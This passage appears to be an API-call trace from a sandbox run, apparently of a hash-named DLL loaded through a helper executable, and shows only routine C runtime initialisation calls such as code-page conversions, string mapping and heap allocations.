!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0166.844] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.844] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0166.844] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.844] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0166.844] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0166.845] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.845] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0166.845] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x100) returned 0x5a1c20 [0166.845] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x180) returned 0x599aa0 [0166.845] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0166.845] GetLastError () returned 0x0 [0166.845] SetLastError (dwErrCode=0x0) [0166.845] GetEnvironmentStringsW () returned 0x5a4680* [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9cc) returned 0x5a5060 [0166.845] FreeEnvironmentStringsW (penv=0x5a4680) returned 1 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x118) returned 0x599ff0 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a0ea0 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5c) returned 0x590780 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x5947a0 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x78) returned 0x59c6f0 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x595a40 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x59b380 [0166.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a0400 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x59b770 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a0950 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x594510 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x59c770 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x594810 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x59b650 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd2) returned 0x595cd0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x7c) returned 0x594000 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a0770 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x90) returned 0x593c30 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b3b0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x594580 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x595ab0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a09a0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5991a0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a0db0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd6) returned 0x595610 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5920e0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b8c0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x592120 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x598f60 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x598fc0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b4a0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x42) returned 0x5a0e50 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x592160 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a05e0 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b3e0 [0166.846] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5060 | out: hHeap=0x590000) returned 1 [0166.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1000) returned 0x5a4680 [0166.846] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0166.847] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0166.847] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" [0166.847] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x599770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0166.848] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0166.851] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.851] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0166.851] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.852] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0166.852] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0166.852] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.853] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0166.853] GetProcessHeap () returned 0x590000 [0166.853] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.853] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0166.853] GetLastError () returned 0x0 [0166.853] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0166.853] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0166.853] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c8) returned 0x5a5b10 [0166.853] SetLastError (dwErrCode=0x0) [0166.854] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1200) returned 0x5a5ee0 [0166.855] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0166.855] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0166.855] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0166.855] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0166.855] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" [0166.855] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" [0166.855] GetACP () returned 0x4e4 [0166.855] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x228) returned 0x59aca0 [0166.855] IsValidCodePage (CodePage=0x4e4) returned 1 [0166.856] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0166.856] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0166.856] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0166.856] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.856] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0166.856] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.856] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" 